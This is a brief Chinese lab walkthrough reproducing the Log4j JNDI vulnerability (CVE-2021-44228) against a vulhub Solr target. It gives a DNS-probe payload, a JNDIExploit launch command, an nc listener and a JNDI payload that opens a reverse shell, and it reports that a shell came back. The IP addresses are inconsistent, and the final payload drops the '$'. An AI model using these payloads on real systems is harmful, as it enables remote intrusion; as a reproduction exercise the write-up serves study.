196 字
1 分钟
Log4J反序列化
环境:
/root/CVE/vulhub-master/log4j/CVE-2021-44228
Kali系统一个——需nc 来监听端口信息,作为攻击机
本机:中转机
centOS:靶机
地址信息:
靶机IP:192.168.1.4:8983
本机IP:192.168.1.2
攻击机:192.168.91.131
开启靶机环境
请求一个DNS域名
http://dnslog.cn/
域名:
gswq4u.dnslog.cn
打开hackbar,先点一下loadURL
将资料中提供的地址,复制
将后面的域名,改为刚刚申请的
gswq4u.dnslog.cn
http://192.168.1.4:8983/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.f6pnnm.dnslog.cn}
点击执行,出现下面页面
这里获得了反馈
现在打开JNDIExploit-1.2,
输入指令
java -jar .\JNDIExploit-1.2-SNAPSHOT.jar -i 本机IP
然后在攻击机,打开端口监听
命令:
nc -lvp 4444
在hackbar构建如下命令、
[http://192.168.91.132:8983/solr/admin/cores?action={jndi:ldap://192.168.0.108:1389/Basic/ReverseShell/192.168.0.111/4444})
点击Execute
发现监听的端口返回了shell
到此复现完成
部分信息可能已经过时